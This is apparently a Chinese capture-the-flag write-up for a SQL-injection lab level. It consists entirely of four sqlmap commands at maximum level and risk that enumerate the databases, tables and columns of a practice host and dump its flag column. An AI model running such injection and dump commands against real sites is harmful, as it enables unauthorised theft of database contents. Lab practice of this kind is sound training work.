第六关和第五关基本上一致的这里我就用sqlmap工具跑
1、查库
python sqlmap.py -u "https://1283-1e7bbb28-8944-4097-b25d-756eba681d48.do-not-trust.hacking.run/?id=1" --batch --threads=10 --leve=5 --risk=3 --dbs
2、查表
>python sqlmap.py -u "https://1283-1e7bbb28-8944-4097-b25d-756eba681d48.do-not-trust.hacking.run/?id=1" --batch --threads=10 --leve=5 --risk=3 --dbms=mysql -D security --tables
3、查字段
python sqlmap.py -u "https://1283-1e7bbb28-8944-4097-b25d-756eba681d48.do-not-trust.hacking.run/?id=1" --batch --threads=10 --leve=5 --risk=3 --dbms=mysql -D security -T d8i64CRt --column
4、爆数据
python sqlmap.py -u "https://1283-1e7bbb28-8944-4097-b25d-756eba681d48.do-not-trust.hacking.run/?id=1" --batch --threads=10 --leve=5 --risk=3 --dbms=mysql -D security -T d8i64CRt -C flag,id --dump